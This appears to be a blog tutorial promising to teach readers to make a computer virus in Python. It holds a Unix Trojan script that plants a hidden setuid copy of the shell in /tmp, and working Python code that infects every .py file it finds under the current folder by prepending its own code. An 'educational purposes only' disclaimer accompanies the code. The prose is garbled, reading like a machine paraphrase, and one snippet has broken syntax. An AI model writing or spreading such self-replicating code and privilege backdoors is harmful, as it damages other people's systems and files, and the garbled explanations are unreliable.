NOTE: Please Don’t use the online compiler is not going to work here. Please install Python 2.7x to the latest version and cv2(OpenCV), argparse modules to actually try out this example.
Hey friends! Welcome back! Before continuing on with Malicious Logic, after reading this blog you will be able to make a Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.
Now, this article will focus more on applications than the theory of computer viruses, worms, and Trojan horses.
But, please note that this article is meant to be used for educational purposes only. I am not promoting the usage of viruses, worms, or trojan horses to attack computer systems and causing damage.
What is Malicious logic?
Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.
cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $*
In this example, we are assuming that “………” is in the path environment and the script has been named ls and is placed in the directory.
Analyzing the script
This script creates a replica of the UNIX Shell this is setuid of the user executing this program. To apprehend setuid programs, we first want to apprehend how User Identity is saved in a UNIX OS.
In UNIX OS, user identification is commonly represented as an integer among zero and generally, 65,535. This quantity is likewise called UID (Unique Identification Number). Now, what setuid programs do is that they devise approaches with the UID of the proprietor and are now no longer of a 3rd person executing the software. This means, that an executor could have the rights of the proprietor… This in itself is a probable vulnerability.
Coming again to our script, so a setuid reproduction of the UNIX shell changed into created. Later on, this software is deleted, after which the proper ls command (for list the documents and folders present in the current running directory) is executed.
Go back to the previous script… Suppose if someone (root) typed:
If the script was typed deliberately, then it will result in a Trojan Horse.
Virus – A basic format
Most computer viruses follow the following basic script:
cp /bin/sh /tmp/.xxsh chmod o+s,w+x /tmp.xxsh
You May Like Other Tutorials;
Beginvirus if spread-condition TRUE then begin for the target files begin if target affected TRUE then begin Determine where to place virus instructions Copy the virus instructions Modify target to spread the virus later End if End for End if Perform some other instruction(s) //Optional Go back to beginning Endvirus
Basically, every computer virus has two phases –
#!/usr/bin/python import os, datetime, inspect DATA_TO_INSERT = "CODEWITHNEPAL" #search for target files in path def search(path): filestoinfect =  filelist = os.listdir(path) for filename in filelist: #If it is a folder if os.path.isdir(path+"/"+filename): filestoinfect.extend(search(path+"/"+filename)) #If it is a python script -> Infect it elif filename[-3:] == ".py": #default value infected = False for line in open(path+"/"+filename): if DATA_TO_INSERT in line: infected = True break if infected == False: filestoinfect.append(path+"/"+filename) return filestoinfect #changes to be made in the target file def infect(filestoinfect): target_file = inspect.currentframe().f_code.co_filename virus = open(os.path.abspath(target_file)) virusstring = "" for i,line in enumerate(virus): if i>=0 and i <41: virusstring += line virus.close for fname in filestoinfect: f = open(fname) temp = f.read() f.close() f = open(fname,"w") f.write(virusstring + temp) f.close() #Not required actually def explode(): if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1: print ("HAPPY APRIL FOOL'S DAY!!") filestoinfect = search(os.path.abspath("")) infect(filestoinfect) explode()
- Insertion phase – in this phase, the virus inserts itself into the target.
- Execution phase– in this phase, the virus performs some actions.
Let’s take a look at a real virus in Python. Now, this is not an actual virus that will cause corruption files, deletion of system files, etc. but just a simple harmless virus.